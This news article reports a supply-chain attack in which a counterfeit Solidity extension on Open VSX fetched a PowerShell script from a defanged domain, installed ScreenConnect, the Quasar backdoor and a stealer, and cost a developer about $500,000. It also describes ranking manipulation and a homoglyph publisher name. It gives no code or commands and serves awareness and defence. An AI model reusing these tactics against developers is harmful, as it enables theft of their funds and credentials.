A Russian blockchain developer lost approximately $500,000 in cryptocurrency after installing a malicious extension from the Open VSX marketplace, highlighting a concerning trend where cybercriminals target developers through compromised IDE extensions. This sophisticated attack demonstrates how threat actors exploit trusted development environments to access high-value cryptocurrency assets.
Anatomy of the Fake Solidity Extension Attack
Security researchers at Kaspersky Lab revealed that the victim’s operating system was installed just days before the incident occurred. Despite being well-versed in cryptocurrency security risks and maintaining strict installation practices for verified software only, the developer fell victim to this carefully orchestrated attack.
The attack vector centered on a malicious extension.js file embedded within a counterfeit Solidity Language extension designed for the Cursor AI development environment. The fraudulent extension had been published in the Open VSX repository approximately two months prior and accumulated 54,000 downloads before detection.
Exploiting Search Algorithm Vulnerabilities
The cybercriminals leveraged Open VSX’s ranking algorithm, which considers multiple factors including extension ratings, recency, download counts, and verification status. The malicious extension achieved 4th position in search results for “solidity” queries, while the legitimate extension ranked only 8th.
Rather than providing the advertised Solidity syntax highlighting functionality, the fake plugin downloaded and executed a malicious PowerShell script from the angelic[.]su server. The extension’s description was completely copied from the legitimate version to maintain credibility.
Multi-Stage Cryptocurrency Theft Operation
Following the initial compromise, attackers deployed a weaponized ScreenConnect build enabling remote system access. The infection chain continued with the deployment of the open-source Quasar backdoor and a comprehensive data stealer targeting browsers, email clients, and cryptocurrency wallets.
The developer initially dismissed the absence of syntax highlighting as a typical extension malfunction, providing attackers with valuable time to establish persistence and execute their cryptocurrency theft operations.
Advanced Social Engineering Tactics
After the initial malicious package was removed on July 2, 2025, the attackers immediately published a new extension titled “solidity” – an exact match to the legitimate plugin name. They artificially inflated download counts to 2 million to enhance credibility.
The most sophisticated aspect involved username spoofing: the legitimate extension belonged to user “juanblanco” while the malicious version used “juanbIanco.” In Cursor AI’s font rendering, the lowercase “l” and uppercase “I” appear identical, making detection nearly impossible through casual inspection.
Protecting Development Environments from Supply Chain Attacks
Security experts emphasize that identifying compromised open-source packages is becoming increasingly challenging. Attackers employ sophisticated social engineering techniques and exploit ranking algorithm weaknesses to promote malicious content effectively.
Critical protection measures include rigorous extension authenticity verification, careful examination of developer names and publication dates, and implementation of isolated environments for cryptocurrency operations. Organizations should establish strict policies for extension installations and maintain updated threat intelligence on emerging attack vectors.
This incident underscores the evolving threat landscape facing blockchain developers and the critical importance of comprehensive security strategies. Even experienced professionals can fall victim to sophisticated attacks, emphasizing the need for continuous security awareness training and robust protective measures when working with external development tools and extensions.
